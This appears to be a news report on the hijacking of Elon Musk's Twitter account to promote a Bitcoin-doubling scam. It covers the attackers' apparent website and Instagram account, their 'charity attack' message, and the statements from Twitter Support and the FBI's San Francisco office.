The official account of the Chief of Tesla and SpaceX, Elon Musk, tweeted about doubling any Bitcoin payment sent to the address of his digital wallet.
Who Was Behind The Attack?
The BBC reported, citing a security source, that a web address – cryptoforhealth.com – was registered by the attackers using the email address [email protected].
“Anthony Elias” registered the website. Or, at least the attackers used this name for the purpose.
Cryptoforhealth is also a registered Instagram handle, set up at the same time as the hack.
“It was us”, read the description of the profile alongside a smiley emoticon.
Furthermore, there was a story on the Instagram account with a message. It read: “It was a charity attack. Your money will find its way to the right place.”
The official Twitter Support (@TwitterSupport) account tweeted that it was aware of the security incident impacting users on Twitter and that it would update everyone shortly.
The FBI’s San Francisco field office put out a statement advising people not to engage in such scams.